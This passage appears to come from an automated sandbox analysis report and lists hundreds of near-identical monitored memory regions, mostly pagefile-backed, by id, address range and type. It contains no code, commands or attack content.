pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7776 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7777 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7778 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7779 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7780 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7781 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7782 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7783 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7784 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7785 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7786 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7787 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7788 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7789 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7790 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7791 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7792 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7793 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7794 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7795 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7796 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7797 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7798 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7799 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7800 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7801 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7802 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7803 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7804 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7805 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7806 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7807 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7808 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7809 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7810 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7811 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7812 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7813 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7814 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7815 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7816 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7817 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7818 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7819 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7820 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7821 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7822 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7823 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7824 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7825 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7826 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7827 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7828 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7829 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7830 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7831 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7832 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7833 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7834 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7835 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7836 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7837 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7838 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7839 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7840 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7841 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7842 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7843 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7844 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7845 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7846 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7847 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7849 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7850 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7851 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7852 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7853 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7854 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7855 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7856 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7857 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7858 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7859 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7860 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7861 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7862 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7863 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7864 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7865 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7866 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7867 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7869 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7870 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7871 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7872 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7873 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7874 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7875 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 7877 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 7878 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 7879 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 7880 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7881 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7882 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7883 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7884 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7885 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7886 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7887 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7888 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7889 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7890 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7891 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7892 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7893 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7894 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7895 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7896 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7897 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7898 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7899 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7900 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7901 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7902 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7903 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7904 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7905 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7906 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7907 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7908 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7909 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7910 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7911 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7912 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7913 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7914 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7915 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7916 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7917 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7918 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7919 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7920 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7921 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7922 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7923 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7924 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7925 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7926 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7927 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7928 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7929 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7930 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7931 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7932 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7933 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7934 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7935 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7936 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7937 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7938 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7939 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7940 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7941 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7942 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7943 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7944 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7945 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7946 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7947 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7948 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7949 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7950 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7951 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7952 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7953 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7954 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7955 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7956 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7957 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7958 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7959 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7960 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7961 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7962 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7963 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7964 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7965 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 7966 start_va = 0x580000 end_va = 